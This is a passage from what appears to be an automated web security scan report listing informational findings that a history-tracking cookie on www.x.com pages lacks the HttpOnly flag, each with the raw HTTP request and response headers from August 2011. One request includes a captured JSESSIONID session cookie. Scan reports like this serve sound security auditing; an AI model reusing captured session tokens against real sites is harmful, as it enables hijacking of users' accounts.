<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.87. https://www.x.com/community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232363b31342c323030323b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363039373b33382c363133383b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:27 GMT; Path=/
Vary: User-Agent
JP: D=143677 t=1313157087084685
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.88. https://www.x.com/community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363133383b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=99334 t=1313157086694004
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.89. https://www.x.com/community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323232363b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=79734 t=1313157086409698
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.90. https://www.x.com/community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=108461 t=1313157085908464
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.91. https://www.x.com/community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323232363b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:25 GMT; Path=/
Vary: User-Agent
JP: D=96364 t=1313157085618096
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.92. https://www.x.com/docs/DOC-1031  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1031

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1031 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313033313b3130322c313337323b3130322c313035313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:48 GMT; Path=/
Vary: User-Agent
JP: D=96847 t=1313157228488141
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.93. https://www.x.com/docs/DOC-1041  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1041

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1041 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313333323b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:07 GMT; Path=/
Vary: User-Agent
JP: D=129414 t=1313157247469487
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.94. https://www.x.com/docs/DOC-1051  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1051

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1051 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313035313b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:48 GMT; Path=/
Vary: User-Agent
JP: D=159037 t=1313157228026431
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.95. https://www.x.com/docs/DOC-1106  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1106

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1106 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/button_manager
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c313130363b3130322c333831313b332c38383139383b332c3133383934323b332c38373839383b332c3134303532383b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b; Expires=Sun, 11-Sep-2011 13:40:10 GMT; Path=/
Vary: User-Agent
JP: D=139511 t=1313156410450395
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.96. https://www.x.com/docs/DOC-1108  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1108

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1108 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b3130322c333335323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:06 GMT; Path=/
Vary: User-Agent
JP: D=99860 t=1313157246030665
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.97. https://www.x.com/docs/DOC-1116  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1116

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1116 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:12 GMT; Path=/
Vary: User-Agent
JP: D=130471 t=1313157252790233
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.98. https://www.x.com/docs/DOC-1176  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1176

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1176 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313130363b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:15 GMT; Path=/
Vary: User-Agent
JP: D=129417 t=1313157255561975
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.99. https://www.x.com/docs/DOC-1204  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1204

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1204 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:13 GMT; Path=/
Vary: User-Agent
JP: D=312167 t=1313157253541541
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.100. https://www.x.com/docs/DOC-1216  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1216

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1216 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:12 GMT; Path=/
Vary: User-Agent
JP: D=91982 t=1313157252137257
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.101. https://www.x.com/docs/DOC-1332  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1332

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1332 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313333323b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:06 GMT; Path=/
Vary: User-Agent
JP: D=140843 t=1313157246673403
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.102. https://www.x.com/docs/DOC-1372  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1372

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1372 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313337323b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:47 GMT; Path=/
Vary: User-Agent
JP: D=87320 t=1313157227528974
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.103. https://www.x.com/docs/DOC-1374  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1374

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1374 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:08 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313337343b3130322c313333323b3130322c313130383b3130322c313034313b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:08 GMT; Path=/
Vary: User-Agent
JP: D=92665 t=1313157248423211
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.104. https://www.x.com/docs/DOC-1401  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1401

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1401 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313430313b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313230343b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:14 GMT; Path=/
Vary: User-Agent
JP: D=292571 t=1313157254169391
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.105. https://www.x.com/docs/DOC-1431  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1431

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1431 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:08 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313433313b3130322c313333323b3130322c313337343b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:09 GMT; Path=/
Vary: User-Agent
JP: D=208093 t=1313157248979182
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.106. https://www.x.com/docs/DOC-1551  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1551

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1551 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
